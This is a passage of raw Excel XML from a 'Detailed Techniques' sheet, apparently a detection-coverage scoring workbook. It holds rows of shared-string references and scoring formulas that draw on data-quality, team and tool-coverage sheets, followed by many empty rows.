        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F213&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F213))-LEN(SUBSTITUTE(TRIM(F213),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I213" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F213&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F213))-LEN(SUBSTITUTE(TRIM(F213),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J213" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F213&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F213))-LEN(SUBSTITUTE(TRIM(F213),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K213" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="214" spans="1:11" ht="356.25" x14ac:dyDescent="0.45">
      <c r="A214" s="8" t="s">
        <v>125</v>
      </c>
      <c r="B214" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C214" s="25" t="s">
        <v>1117</v>
      </c>
      <c r="D214" s="10" t="s">
        <v>1118</v>
      </c>
      <c r="E214" s="10" t="s">
        <v>1119</v>
      </c>
      <c r="F214" s="10" t="s">
        <v>1120</v>
      </c>
      <c r="G214" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K214,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H214" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F214&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F214))-LEN(SUBSTITUTE(TRIM(F214),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I214" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F214&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F214))-LEN(SUBSTITUTE(TRIM(F214),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J214" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F214&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F214))-LEN(SUBSTITUTE(TRIM(F214),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K214" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="215" spans="1:11" ht="114" x14ac:dyDescent="0.45">
      <c r="A215" s="8" t="s">
        <v>175</v>
      </c>
      <c r="B215" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C215" s="25" t="s">
        <v>1121</v>
      </c>
      <c r="D215" s="10" t="s">
        <v>1122</v>
      </c>
      <c r="E215" s="10" t="s">
        <v>1123</v>
      </c>
      <c r="F215" s="10" t="s">
        <v>1124</v>
      </c>
      <c r="G215" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K215,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H215" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F215&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F215))-LEN(SUBSTITUTE(TRIM(F215),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I215" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F215&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F215))-LEN(SUBSTITUTE(TRIM(F215),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J215" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F215&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F215))-LEN(SUBSTITUTE(TRIM(F215),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K215" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="216" spans="1:11" ht="409.5" x14ac:dyDescent="0.45">
      <c r="A216" s="8" t="s">
        <v>226</v>
      </c>
      <c r="B216" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C216" s="25" t="s">
        <v>1125</v>
      </c>
      <c r="D216" s="10" t="s">
        <v>1126</v>
      </c>
      <c r="E216" s="10" t="s">
        <v>1127</v>
      </c>
      <c r="F216" s="10" t="s">
        <v>1128</v>
      </c>
      <c r="G216" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K216,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H216" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F216&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F216))-LEN(SUBSTITUTE(TRIM(F216),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I216" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F216&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F216))-LEN(SUBSTITUTE(TRIM(F216),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J216" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F216&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F216))-LEN(SUBSTITUTE(TRIM(F216),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K216" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="217" spans="1:11" ht="128.25" x14ac:dyDescent="0.45">
      <c r="A217" s="8" t="s">
        <v>205</v>
      </c>
      <c r="B217" s="8" t="s">
        <v>939</v>
      </c>
      <c r="C217" s="25" t="s">
        <v>1129</v>
      </c>
      <c r="D217" s="10" t="s">
        <v>1130</v>
      </c>
      <c r="E217" s="10" t="s">
        <v>1131</v>
      </c>
      <c r="F217" s="10" t="s">
        <v>942</v>
      </c>
      <c r="G217" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K217,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H217" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F217&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F217))-LEN(SUBSTITUTE(TRIM(F217),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I217" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F217&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F217))-LEN(SUBSTITUTE(TRIM(F217),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J217" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F217&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F217))-LEN(SUBSTITUTE(TRIM(F217),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K217" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="218" spans="1:11" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A218" s="8" t="s">
        <v>165</v>
      </c>
      <c r="B218" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C218" s="25" t="s">
        <v>1132</v>
      </c>
      <c r="D218" s="10" t="s">
        <v>1133</v>
      </c>
      <c r="E218" s="10" t="s">
        <v>1134</v>
      </c>
      <c r="F218" s="10" t="s">
        <v>1135</v>
      </c>
      <c r="G218" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K218,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H218" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F218&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F218))-LEN(SUBSTITUTE(TRIM(F218),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I218" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F218&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F218))-LEN(SUBSTITUTE(TRIM(F218),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J218" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F218&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F218))-LEN(SUBSTITUTE(TRIM(F218),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K218" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="219" spans="1:11" ht="299.25" x14ac:dyDescent="0.45">
      <c r="A219" s="8" t="s">
        <v>208</v>
      </c>
      <c r="B219" s="8" t="s">
        <v>939</v>
      </c>
      <c r="C219" s="25" t="s">
        <v>1136</v>
      </c>
      <c r="D219" s="10" t="s">
        <v>1137</v>
      </c>
      <c r="E219" s="10" t="s">
        <v>1138</v>
      </c>
      <c r="F219" s="10" t="s">
        <v>942</v>
      </c>
      <c r="G219" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K219,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H219" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F219&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F219))-LEN(SUBSTITUTE(TRIM(F219),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I219" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F219&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F219))-LEN(SUBSTITUTE(TRIM(F219),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J219" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F219&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F219))-LEN(SUBSTITUTE(TRIM(F219),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K219" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="220" spans="1:11" ht="285" x14ac:dyDescent="0.45">
      <c r="A220" s="8" t="s">
        <v>1139</v>
      </c>
      <c r="B220" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C220" s="25" t="s">
        <v>1140</v>
      </c>
      <c r="D220" s="10" t="s">
        <v>1141</v>
      </c>
      <c r="E220" s="10" t="s">
        <v>1142</v>
      </c>
      <c r="F220" s="10" t="s">
        <v>1143</v>
      </c>
      <c r="G220" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K220,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H220" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F220&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F220))-LEN(SUBSTITUTE(TRIM(F220),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I220" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F220&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F220))-LEN(SUBSTITUTE(TRIM(F220),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J220" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F220&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F220))-LEN(SUBSTITUTE(TRIM(F220),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K220" s="51">
        <f t="shared" si="25"/>
        <v>0</v>
      </c>
    </row>
    <row r="221" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A221"/>
      <c r="B221"/>
      <c r="C221"/>
      <c r="D221"/>
      <c r="E221"/>
      <c r="F221"/>
      <c r="G221"/>
      <c r="H221"/>
      <c r="I221"/>
      <c r="J221"/>
      <c r="K221"/>
    </row>
    <row r="222" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A222"/>
      <c r="B222"/>
      <c r="C222"/>
      <c r="D222"/>
      <c r="E222"/>
      <c r="F222"/>
      <c r="G222"/>
      <c r="H222"/>
      <c r="I222"/>
      <c r="J222"/>
      <c r="K222"/>
    </row>
    <row r="223" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A223"/>
      <c r="B223"/>
      <c r="C223"/>
      <c r="D223"/>
      <c r="E223"/>
      <c r="F223"/>
      <c r="G223"/>
      <c r="H223"/>
      <c r="I223"/>
      <c r="J223"/>
      <c r="K223"/>
    </row>
    <row r="224" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A224"/>
      <c r="B224"/>
      <c r="C224"/>
      <c r="D224"/>
      <c r="E224"/>
      <c r="F224"/>
      <c r="G224"/>
      <c r="H224"/>
      <c r="I224"/>
      <c r="J224"/>
      <c r="K224"/>
    </row>
    <row r="225" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A225"/>
      <c r="B225"/>
      <c r="C225"/>
      <c r="D225"/>
      <c r="E225"/>
      <c r="F225"/>
      <c r="G225"/>
      <c r="H225"/>
      <c r="I225"/>
      <c r="J225"/>
      <c r="K225"/>
    </row>
    <row r="226" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A226"/>
      <c r="B226"/>
      <c r="C226"/>
      <c r="D226"/>
      <c r="E226"/>
      <c r="F226"/>
      <c r="G226"/>
      <c r="H226"/>
      <c r="I226"/>
      <c r="J226"/>
      <c r="K226"/>
    </row>
    <row r="227" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A227"/>
      <c r="B227"/>
      <c r="C227"/>
      <c r="D227"/>
      <c r="E227"/>
      <c r="F227"/>
      <c r="G227"/>
      <c r="H227"/>
      <c r="I227"/>
      <c r="J227"/>
      <c r="K227"/>
    </row>
    <row r="228" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A228"/>
      <c r="B228"/>
      <c r="C228"/>
      <c r="D228"/>
      <c r="E228"/>
      <c r="F228"/>
      <c r="G228"/>
      <c r="H228"/>
      <c r="I228"/>
      <c r="J228"/>
      <c r="K228"/>
    </row>
    <row r="229" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A229"/>
      <c r="B229"/>
      <c r="C229"/>
      <c r="D229"/>
      <c r="E229"/>
      <c r="F229"/>
      <c r="G229"/>
      <c r="H229"/>
      <c r="I229"/>
      <c r="J229"/>
      <c r="K229"/>
    </row>
    <row r="230" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A230"/>
      <c r="B230"/>
      <c r="C230"/>
      <c r="D230"/>
      <c r="E230"/>
      <c r="F230"/>
      <c r="G230"/>
      <c r="H230"/>
      <c r="I230"/>
      <c r="J230"/>
      <c r="K230"/>
    </row>
    <row r="231" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A231"/>
      <c r="B231"/>
      <c r="C231"/>
      <c r="D231"/>
      <c r="E231"/>
      <c r="F231"/>
      <c r="G231"/>
      <c r="H231"/>
      <c r="I231"/>
      <c r="J231"/>
      <c r="K231"/>
    </row>
    <row r="232" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A232"/>
      <c r="B232"/>
      <c r="C232"/>
      <c r="D232"/>
      <c r="E232"/>
      <c r="F232"/>
      <c r="G232"/>
      <c r="H232"/>
      <c r="I232"/>
      <c r="J232"/>
      <c r="K232"/>
    </row>
    <row r="233" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A233"/>
      <c r="B233"/>
      <c r="C233"/>
      <c r="D233"/>
      <c r="E233"/>
      <c r="F233"/>
      <c r="G233"/>
      <c r="H233"/>
      <c r="I233"/>
      <c r="J233"/>
      <c r="K233"/>
    </row>
    <row r="234" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A234"/>
      <c r="B234"/>
      <c r="C234"/>
      <c r="D234"/>
      <c r="E234"/>
      <c r="F234"/>
      <c r="G234"/>
      <c r="H234"/>
      <c r="I234"/>
      <c r="J234"/>
      <c r="K234"/>
    </row>
    <row r="235" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A235"/>
      <c r="B235"/>
      <c r="C235"/>
      <c r="D235"/>
      <c r="E235"/>
      <c r="F235"/>
      <c r="G235"/>
      <c r="H235"/>
      <c r="I235"/>
      <c r="J235"/>
      <c r="K235"/>
    </row>
    <row r="236" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A236"/>
      <c r="B236"/>
      <c r="C236"/>
      <c r="D236"/>
      <c r="E236"/>
      <c r="F236"/>
      <c r="G236"/>
      <c r="H236"/>
      <c r="I236"/>
      <c r="J236"/>
      <c r="K236"/>
    </row>
    <row r="237" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A237"/>
      <c r="B237"/>
      <c r="C237"/>
      <c r="D237"/>
      <c r="E237"/>
      <c r="F237"/>
      <c r="G237"/>
      <c r="H237"/>
      <c r="I237"/>
      <c r="J237"/>
      <c r="K237"/>
    </row>
    <row r="238" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A238"/>
      <c r="B238"/>
      <c r="C238"/>
      <c r="D238"/>
      <c r="E238"/>
      <c r="F238"/>
      <c r="G238"/>
      <c r="H238"/>
      <c r="I238"/>
      <c r="J238"/>
      <c r="K238"/>
    </row>
    <row r="239" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A239"/>
      <c r="B239"/>
      <c r="C239"/>
      <c r="D239"/>
      <c r="E239"/>
      <c r="F239"/>
      <c r="G239"/>
      <c r="H239"/>
      <c r="I239"/>
      <c r="J239"/>
      <c r="K239"/>
    </row>
    <row r="240" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A240"/>
      <c r="B240"/>
      <c r="C240"/>
      <c r="D240"/>
      <c r="E240"/>
      <c r="F240"/>
      <c r="G240"/>
      <c r="H240"/>
      <c r="I240"/>
      <c r="J240"/>
      <c r="K240"/>
    </row>
    <row r="241" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A241"/>
      <c r="B241"/>
      <c r="C241"/>
      <c r="D241"/>
      <c r="E241"/>
      <c r="F241"/>
      <c r="G241"/>
      <c r="H241"/>
      <c r="I241"/>
      <c r="J241"/>
      <c r="K241"/>
    </row>
    <row r="242" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A242"/>
      <c r="B242"/>
      <c r="C242"/>
      <c r="D242"/>
      <c r="E242"/>
      <c r="F242"/>
      <c r="G242"/>
      <c r="H242"/>
      <c r="I242"/>
      <c r="J242"/>
      <c r="K242"/>
    </row>
    <row r="243" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A243"/>
      <c r="B243"/>
      <c r="C243"/>
      <c r="D243"/>
      <c r="E243"/>
      <c r="F243"/>
      <c r="G243"/>
      <c r="H243"/>
      <c r="I243"/>
      <c r="J243"/>
      <c r="K243"/>
    </row>
    <row r="244" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A244"/>
      <c r="B244"/>
      <c r="C244"/>
      <c r="D244"/>
      <c r="E244"/>
      <c r="F244"/>
      <c r="G244"/>
      <c r="H244"/>
      <c r="I244"/>
      <c r="J244"/>
      <c r="K244"/>
    </row>
    <row r="245" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A245"/>
      <c r="B245"/>
      <c r="C245"/>
      <c r="D245"/>
      <c r="E245"/>
      <c r="F245"/>
      <c r="G245"/>
      <c r="H245"/>
      <c r="I245"/>
      <c r="J245"/>
      <c r="K245"/>
    </row>
    <row r="246" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A246"/>
      <c r="B246"/>
      <c r="C246"/>
      <c r="D246"/>
      <c r="E246"/>
      <c r="F246"/>
      <c r="G246"/>
      <c r="H246"/>
      <c r="I246"/>
      <c r="J246"/>
      <c r="K246"/>
    </row>
    <row r="247" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A247"/>
      <c r="B247"/>
      <c r="C247"/>
      <c r="D247"/>
      <c r="E247"/>
      <c r="F247"/>
      <c r="G247"/>
      <c r="H247"/>
      <c r="I247"/>
      <c r="J247"/>
      <c r="K247"/>
    </row>
    <row r="248" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A248"/>
      <c r="B248"/>
      <c r="C248"/>
      <c r="D248"/>
      <c r="E248"/>
      <c r="F248"/>
      <c r="G248"/>
      <c r="H248"/>
      <c r="I248"/>
      <c r="J248"/>
      <c r="K248"/>
    </row>
    <row r="249" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A249"/>
      <c r="B249"/>
      <c r="C249"/>
      <c r="D249"/>
      <c r="E249"/>
      <c r="F249"/>
      <c r="G249"/>
      <c r="H249"/>
      <c r="I249"/>
      <c r="J249"/>
      <c r="K249"/>
    </row>
    <row r="250" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A250"/>
      <c r="B250"/>
      <c r="C250"/>
      <c r="D250"/>
      <c r="E250"/>
      <c r="F250"/>
      <c r="G250"/>
      <c r="H250"/>
      <c r="I250"/>
      <c r="J250"/>
      <c r="K250"/>
    </row>
    <row r="251" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A251"/>
      <c r="B251"/>
      <c r="C251"/>
      <c r="D251"/>
      <c r="E251"/>
      <c r="F251"/>
      <c r="G251"/>
      <c r="H251"/>
      <c r="I251"/>
      <c r="J251"/>
      <c r="K251"/>
    </row>
    <row r="252" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A252"/>
      <c r="B252"/>
      <c r="C252"/>
      <c r="D252"/>
      <c r="E252"/>
      <c r="F252"/>
      <c r="G252"/>
      <c r="H252"/>
      <c r="I252"/>
      <c r="J252"/>
      <c r="K252"/>
    </row>
    <row r="253" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A253"/>
      <c r="B253"/>
      <c r="C253"/>
      <c r="D253"/>
      <c r="E253"/>
      <c r="F253"/>
      <c r="G253"/>
      <c r="H253"/>
      <c r="I253"/>
      <c r="J253"/>
      <c r="K253"/>
    </row>
    <row r="254" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A254"/>
      <c r="B254"/>
      <c r="C254"/>
      <c r="D254"/>
      <c r="E254"/>
      <c r="F254"/>
      <c r="G254"/>
      <c r="H254"/>
      <c r="I254"/>
      <c r="J254"/>
      <c r="K254"/>
    </row>
    <row r="255" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A255"/>
      <c r="B255"/>
      <c r="C255"/>
      <c r="D255"/>
      <c r="E255"/>
      <c r="F255"/>
      <c r="G255"/>
      <c r="H255"/>
      <c r="I255"/>
      <c r="J255"/>
      <c r="K255"/>
    </row>
    <row r="256" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A256"/>
      <c r="B256"/>
      <c r="C256"/>
      <c r="D256"/>
      <c r="E256"/>
      <c r="F256"/>
      <c r="G256"/>
      <c r="H256"/>
      <c r="I256"/>
      <c r="J256"/>
      <c r="K256"/>
    </row>
    <row r="257" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A257"/>
      <c r="B257"/>
      <c r="C257"/>
      <c r="D257"/>
      <c r="E257"/>
      <c r="F257"/>
      <c r="G257"/>
      <c r="H257"/>
      <c r="I257"/>
      <c r="J257"/>
      <c r="K257"/>
    </row>
    <row r="258" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A258"/>
      <c r="B258"/>
      <c r="C258"/>
      <c r="D258"/>
      <c r="E258"/>
      <c r="F258"/>
      <c r="G258"/>
      <c r="H258"/>
      <c r="I258"/>
      <c r="J258"/>
      <c r="K258"/>
    </row>
    <row r="259" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A259"/>
      <c r="B259"/>
      <c r="C259"/>
      <c r="D259"/>
      <c r="E259"/>
      <c r="F259"/>
      <c r="G259"/>
      <c r="H259"/>
      <c r="I259"/>
      <c r="J259"/>
      <c r="K259"/>
    </row>
    <row r="260" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A260"/>
      <c r="B260"/>
      <c r="C260"/>
      <c r="D260"/>
      <c r="E260"/>
      <c r="F260"/>
      <c r="G260"/>
      <c r="H260"/>
      <c r="I260"/>
      <c r="J260"/>
      <c r="K260"/>
    </row>
    <row r="261" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A261"/>
      <c r="B261"/>
      <c r="C261"/>
      <c r="D261"/>
      <c r="E261"/>
      <c r="F261"/>
      <c r="G261"/>
      <c r="H261"/>
      <c r="I261"/>
      <c r="J261"/>
      <c r="K261"/>
    </row>
    <row r="262" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A262"/>
      <c r="B262"/>
      <c r="C262"/>
      <c r="D262"/>
      <c r="E262"/>
      <c r="F262"/>
      <c r="G262"/>
      <c r="H262"/>
      <c r="I262"/>
      <c r="J262"/>
      <c r="K262"/>
    </row>
    <row r="263" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A263"/>
      <c r="B263"/>
      <c r="C263"/>
      <c r="D263"/>
      <c r="E263"/>
      <c r="F263"/>
      <c r="G263"/>
      <c r="H263"/>
      <c r="I263"/>
      <c r="J263"/>
      <c r="K263"/>
    </row>
    <row r="264" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A264"/>
      <c r="B264"/>
      <c r="C264"/>
      <c r="D264"/>
      <c r="E264"/>
      <c r="F264"/>
      <c r="G264"/>
      <c r="H264"/>
      <c r="I264"/>
      <c r="J264"/>
      <c r="K264"/>
    </row>
    <row r="265" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A265"/>
      <c r="B265"/>
      <c r="C265"/>
      <c r="D265"/>
      <c r="E265"/>
      <c r="F265"/>
      <c r="G265"/>
      <c r="H265"/>
      <c r="I265"/>
      <c r="J265"/>
      <c r="K265"/>
    </row>
    <row r="266" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A266"/>
      <c r="B266"/>
      <c r="C266"/>
      <c r="D266"/>
      <c r="E266"/>
      <c r="F266"/>
      <c r="G266"/>
      <c r="H266"/>
      <c r="I266"/>
      <c r="J266"/>
      <c r="K266"/>
    </row>
    <row r="267" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A267"/>
      <c r="B267"/>
      <c r="C267"/>
      <c r="D267"/>
      <c r="E267"/>
      <c r="F267"/>
      <c r="G267"/>
      <c r="H267"/>
      <c r="I267"/>
      <c r="J267"/>
      <c r="K267"/>
    </row>
    <row r="268" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A268"/>
      <c r="B268"/>
      <c r="C268"/>
      <c r="D268"/>
      <c r="E268"/>
      <c r="F268"/>
      <c r="G268"/>
      <c r="H268"/>
      <c r="I268"/>
      <c r="J268"/>
      <c r="K268"/>
    </row>
    <row r="269" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A269"/>
      <c r="B269"/>
      <c r="C269"/>
      <c r="D269"/>
      <c r="E269"/>
      <c r="F269"/>
      <c r="G269"/>
      <c r="H269"/>
      <c r="I269"/>
      <c r="J269"/>
      <c r="K269"/>
    </row>
    <row r="270" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A270"/>
      <c r="B270"/>
      <c r="C270"/>
      <c r="D270"/>
      <c r="E270"/>
      <c r="F270"/>
      <c r="G270"/>
      <c r="H270"/>
      <c r="I270"/>
      <c r="J270"/>
      <c r="K270"/>
    </row>
    <row r="271" spans="1:11" x14ac:dyDescent="0.45">
      <c r="A271"/>
      <c r="B271"/>
